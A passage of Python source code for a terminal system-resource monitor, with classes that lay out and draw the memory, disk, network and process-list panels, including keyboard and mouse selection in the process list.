f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
out += f'{Mv.to(y + h - 1, x + 1)}{THEME.graph_text}up {cpu.uptime}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 2: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
out += f'{Meters.disks_used[name](None if cls.resized else mem.disks[name]["used_percent"])}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 2
if len(mem.disks) * 3 <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name](None if cls.resized else mem.disks[name]["free_percent"])}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
num = 3
height_p = 30
width_p = 45
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "net" in cls.boxes:
cls.width = Term.width
return
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if not "net" in cls.boxes: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if not "net" in cls.boxes: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
num = 4
height_p = 68
width_p = 55
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "proc" in cls.boxes:
cls.width = Term.width
return
width_p: int; height_p: int
if not "net" in cls.boxes and not "mem" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if not "proc" in cls.boxes: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key == "up":
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key == "down":
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if not "proc" in cls.boxes: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details.get("killed", False)
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
